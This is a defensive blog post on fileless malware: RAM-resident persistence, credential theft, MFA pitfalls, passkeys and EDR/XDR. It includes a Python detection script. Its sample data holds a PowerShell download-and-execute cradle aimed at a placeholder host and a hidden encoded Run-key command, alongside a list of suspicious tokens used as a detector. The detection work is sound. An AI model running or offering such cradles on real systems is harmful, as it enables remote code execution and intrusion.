Fileless malware is one of the most dangerous attack types in the cybersecurity world right now, and the reason most people haven’t heard of it is also the reason it’s so effective: it leaves no trace. No file on your hard drive. No signature for your antivirus to find. Just malicious code sitting quietly in your RAM, doing what it was sent to do — and most of the time, nobody knows it’s there until it’s way too late.

This blog post summarizes the main points of my latest podcast episode. If you’d like, you can listen to it or watch it at https://www.backupwrapup.com/fileless-malware-attack-lives-in-memory-leaves-no-trace.
I’ll be honest with you — this topic pushed the edges of my own knowledge, and I’ve been doing this for over 30 years. I brought in Dr. Mike Saylor, my co-author on Learning Ransomware Response & Recovery, to walk me through it. And by the time we were done, I had a much clearer picture of why fileless malware is such a big deal, what defenders need to know, and — maybe more importantly — what you can actually do about it today.
What Fileless Malware Actually Is
Traditional malware works by downloading something to your hard drive. Your antivirus sees it, flags it, quarantines it. That’s the game your security tools are built to play. Fileless malware doesn’t play that game. Instead of writing anything to disk, it loads directly into memory — RAM — and runs from there. Memory is volatile, meaning it gets wiped when you power down. So in theory, a reboot should clear it out. Here’s the problem: bad guys figured that out a long time ago.
What they do instead is modify the operating system or inject entries into the Windows registry so that when the machine restarts, the malware reloads itself right back into memory. In the ArcGIS attack that Mike referenced in our episode, attackers actually rewrote the base software the tool ran on — so every time the server rebooted, it reinfected itself. They were sitting inside that network undetected for two years. Two years. The only way to get rid of it was to wipe and re-image every affected machine from scratch.
That’s the thing about fileless malware — it’s not just stealthy on the way in. It’s engineered to stay.
Why Fileless Malware Loves Your Credentials
Here’s where it gets really interesting, and really dangerous. Memory isn’t just where code runs — it’s where your credentials live. Session tokens, admin logins, RDP sessions, network share authentication — all of that passes through RAM. Fileless malware is often specifically designed to harvest those credentials. It’ll sit there quietly, map out everything it has access to, and then either hand those credentials off to an initial access broker or use them to move laterally across your network.
Mike made a point that stuck with me: fileless malware is usually phase one. The silent, stealthy foothold. The recon mission. Once it’s figured out what it has access to, it escalates — and fast. By the time you know something’s wrong, the attackers have likely already moved well beyond the machine where they got in.
This is also why storing credentials in your browser is such a problem. Fileless malware looks there first. If you’ve got session tokens cached, saved passwords, or trusted devices that skip MFA prompts — all of that is low-hanging fruit.
MFA Is Good. MFA Done Wrong Is Almost Useless.
We talk about MFA a lot on this show, and Mike had some strong words about it in this episode. The concept is solid. The execution is often terrible. A company can turn MFA on and still be wide open if they’re letting people save credentials in the browser, trust machines so they can skip the prompt, or cache session tokens that fileless malware can grab and use to hijack an active session — no password required, no MFA prompt triggered.
MFA only works if you do it every time. Not most of the time. Every time.
The better answer, Mike says, is passkeys — FIDO-compliant authentication that doesn’t rely on a session token that can be stolen. And beyond that, one thing I didn’t know about MFA before this conversation: it’s not just designed to keep bad guys out. It’s also designed to tell you when bad guys are trying to get in. If you get an MFA prompt you didn’t initiate, that means someone already has your password. That’s a signal. Don’t ignore it.
When It’s Time for EDR — and What That Actually Means
Once you’ve got the basics covered — good MFA, passkeys where you can, no saved credentials in the browser — the next level is EDR. Endpoint Detection and Response. Think of it as the evolution of antivirus, but actually capable of dealing with fileless malware.
Modern EDR tools don’t just look for files. They monitor memory, watch process behavior, sandbox new activity to see how it behaves, and — critically — they can take action. Isolate a machine from the network. Suspend a user account in Active Directory. Write new firewall rules. Tools like Huntress are doing volatile memory analysis and behavior-based detection that traditional antivirus simply can’t do.
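To make the two ideas above concrete, the registry autostart persistence described earlier and the behavior-based checks an EDR performs, here is a small added example (not code from the podcast, the post, or any EDR product). It runs simple detection heuristics over constructed autostart entries and process-creation records of the kind Sysmon or an EDR agent would collect: a script host launched from a Run key, a Base64-encoded command line, and an office application spawning a script interpreter. All sample records, registry paths, and the example.invalid URL are constructed for illustration; the heuristics are the well-known public ones, not a vendor's detection logic.

```python
"""Flag fileless-style persistence and execution indicators.

Added example: scans constructed autostart entries and process records for
the patterns an EDR's behavior monitoring looks at. Not production detection
logic; all sample data below is constructed.
"""
import base64
import re
from dataclasses import dataclass

# Script hosts commonly used to run code without dropping a binary to disk.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Parents that should rarely spawn a script host directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
# PowerShell's -EncodedCommand (and its short forms) followed by Base64.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring",
                     "frombase64string", "-nop", "-w hidden", "-windowstyle hidden")


@dataclass
class Finding:
    source: str   # registry value or "parent -> child"
    reason: str   # which heuristic fired
    detail: str   # the evidence


def image_name(cmdline: str) -> str:
    """Return the lower-cased executable basename from a command line."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        first = cmdline[1:end] if end > 0 else cmdline[1:]
    else:
        parts = cmdline.split()
        first = parts[0] if parts else ""
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Decode a PowerShell -EncodedCommand payload (UTF-16LE Base64) or None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def token_findings(source: str, cmdline: str, decoded) -> list:
    """One finding per suspicious token seen in the raw or decoded command."""
    haystack = cmdline.lower() + " " + (decoded or "").lower()
    return [Finding(source, "suspicious token", tok)
            for tok in SUSPICIOUS_TOKENS if tok in haystack]


def check_autostart(entry: dict) -> list:
    """Heuristics for a registry Run-style autostart value."""
    source, cmd = entry["source"], entry["command"]
    findings = []
    exe = image_name(cmd)
    if exe in SCRIPT_HOSTS:
        findings.append(Finding(source, "autostart runs script host", exe))
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append(Finding(source, "encoded command in autostart", decoded.strip()))
    findings.extend(token_findings(source, cmd, decoded))
    return findings


def check_process(event: dict) -> list:
    """Heuristics for a process-creation record (parent, image, cmdline)."""
    parent, image = event["parent"].lower(), event["image"].lower()
    source = f"{parent} -> {image}"
    findings = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(Finding(source, "office app spawned script host", image))
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        findings.append(Finding(source, "encoded command line", decoded.strip()))
    findings.extend(token_findings(source, event["cmdline"], decoded))
    return findings


def scan(autostarts: list, processes: list) -> list:
    """Run every check and return the combined findings."""
    findings = []
    for entry in autostarts:
        findings.extend(check_autostart(entry))
    for event in processes:
        findings.extend(check_process(event))
    return findings


# Constructed sample data. The encoded payload is a harmless Write-Host,
# built here so the Base64 is exact.
SAMPLE_B64 = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()
AUTOSTART_SAMPLES = [
    {"source": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "command": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"source": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "command": "powershell.exe -nop -w hidden -EncodedCommand " + SAMPLE_B64},
]
PROCESS_SAMPLES = [
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe report.txt"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/x')\""},
]

if __name__ == "__main__":
    for f in scan(AUTOSTART_SAMPLES, PROCESS_SAMPLES):
        print(f"[{f.reason}] {f.source}: {f.detail}")
```

The point of the example is the shape of the detection, not the specific strings: the benign OneDrive autostart and the notepad launch produce nothing, while the script-host autostart, the decoded command, and the office-to-PowerShell parent-child chain each surface as separate findings that an analyst can triage. Real telemetry would come from Sysmon event ID 1 or the EDR agent rather than hand-built dictionaries.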
Pair your EDR with XDR — Extended Detection and Response — and you get visibility into everything: east-west traffic inside your network, north-south traffic coming in and going out. You can see where an attack came from, where it went, who it talked to, and what it touched. That’s the full picture you need to actually respond to a fileless malware incident rather than just discover it two years later.
This is the 401k conversation. Don’t have it before you’ve built your emergency fund. But when you’re ready, it’s one of the most powerful upgrades you can make to your security posture.
Written by W. Curtis Preston (@wcpreston), four-time O'Reilly author, and host of The Backup Wrap-up podcast. I am now the Technology Evangelist at S2|DATA, which helps companies manage their legacy data.